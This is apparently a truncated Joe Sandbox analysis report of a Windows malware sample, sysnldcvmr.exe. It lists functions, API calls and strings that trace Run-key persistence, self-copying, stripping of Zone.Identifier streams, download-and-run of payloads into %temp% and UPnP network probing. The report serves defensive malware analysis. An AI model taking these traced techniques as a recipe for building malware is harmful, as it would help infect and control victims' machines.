                                                                                                                    control_flow_graph 301 402020-402032 call 409d90 304 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 301->304 305 4021aa-4021ae 301->305 306 402076-402089 CreateIoCompletionPort 304->306 307 40219f-4021a8 call 401600 304->307 306->307 308 40208f-402099 call 40d130 306->308 307->305 308->307 313 40209f-4020b7 WSASocketA 308->313 313->307 314 4020bd-402120 setsockopt htons bind 313->314 314->307 315 402126-402138 listen 314->315 315->307 316 40213a-402145 WSACreateEvent 315->316 316->307 317 402147-402157 WSAEventSelect 316->317 317->307 318 402159-40215f 317->318 319 402161-402171 call 40d160 318->319 320 40217f-40218f call 40d160 318->320 324 402176-40217d 319->324 323 402194-40219e 320->323 324->319 324->320
                                                                                                                    APIs
                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1603358586-0
                                                                                                                    • Opcode ID: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                                                                    • Opcode Fuzzy Hash: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                                                                    Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 342 40d710-40d737 socket 343 40d871-40d875 342->343 344 40d73d-40d805 htons inet_addr setsockopt call 40aa80 bind lstrlenA sendto ioctlsocket 342->344 345 40d877-40d87d 343->345 346 40d87f-40d885 343->346 349 40d80b-40d812 344->349 345->346 350 40d814-40d823 call 40d890 349->350 351 40d865-40d869 call 40ab40 349->351 354 40d828-40d830 350->354 355 40d86e 351->355 356 40d832 354->356 357 40d834-40d863 call 409fe0 354->357 355->343 356->351 357->349
                                                                                                                    APIs
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                    • String ID: 239.255.255.250
                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4174406920-0
                                                                                                                    • Opcode ID: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                                                                    • Opcode Fuzzy Hash: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                                                                    Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 107502007-0
                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                                                                    Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                    Strings
                                                                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                                                                    Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                    • String ID: Bz@
                                                                                                                    • API String ID: 1815803762-793989200
                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3943618503-0
                                                                                                                    • Opcode ID: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                                                                    • Opcode Fuzzy Hash: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                                                                    Function 00407590 Relevance: 119.4, APIs: 50, Strings: 18, Instructions: 351sleepfilesynchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040759E
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,753f85d83d), ref: 004075AD
                                                                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000105), ref: 00407602
                                                                                                                    • PathFindFileNameW.SHLWAPI(C:\Windows\sysnldcvmr.exe), ref: 0040760D
                                                                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                                                                    • wcscmp.NTDLL ref: 00407663
                                                                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysnldcvmr.exe$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                                                                    • API String ID: 4172876685-802261169
                                                                                                                    • Opcode ID: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                                                                    • Opcode Fuzzy Hash: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D
                                                                                                                    Function 0040EAE0 Relevance: 72.0, APIs: 34, Strings: 7, Instructions: 227filenetworksleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                                                                    • rand.MSVCRT ref: 0040EB39
                                                                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                                                                    • rand.MSVCRT ref: 0040ED41
                                                                                                                    • rand.MSVCRT ref: 0040ED55
                                                                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@
                                                                                                                    • API String ID: 3709769524-1557916875
                                                                                                                    • Opcode ID: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                                                                    • Opcode Fuzzy Hash: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                                                                    Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 91 40aea0-40aeb7 call 40add0 94 40aeb9 91->94 95 40aebe-40aeda call 40aa20 strcmp 91->95 96 40b145-40b148 94->96 99 40aee1-40aefd call 40aa20 strstr 95->99 100 40aedc 95->100 103 40af40-40af5c call 40aa20 strstr 99->103 104 40aeff-40af1b call 40aa20 strstr 99->104 100->96 109 40af5e-40af7a call 40aa20 strstr 103->109 110 40af9f-40afbb call 40aa20 strstr 103->110 111 40af3b 104->111 112 40af1d-40af39 call 40aa20 strstr 104->112 119 40af9a 109->119 120 40af7c-40af98 call 40aa20 strstr 109->120 121 40afbd-40afd9 call 40aa20 strstr 110->121 122 40affe-40b014 EnterCriticalSection 110->122 111->96 112->103 112->111 119->96 120->110 120->119 130 40aff9 121->130 131 40afdb-40aff7 call 40aa20 strstr 121->131 123 40b01f-40b028 122->123 127 40b059-40b064 call 40b150 123->127 128 40b02a-40b03a 123->128 139 40b13a-40b13f LeaveCriticalSection 127->139 140 40b06a-40b078 127->140 132 40b057 128->132 133 40b03c-40b055 call 40d4a0 128->133 130->96 131->122 131->130 132->123 133->127 139->96 143 40b07a 140->143 144 40b07e-40b080 call 409d90 140->144 143->144 146 40b085-40b08f 144->146 146->139 147 40b095-40b0b2 call 40d4a0 146->147 150 40b0b4-40b0c4 147->150 151 40b10a-40b122 147->151 152 40b0d0-40b108 call 40a1b0 150->152 153 40b0c6-40b0ce Sleep 150->153 154 40b128-40b133 call 40b150 151->154 152->154 153->150 154->139 159 40b135 call 40ab80 154->159 159->139
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
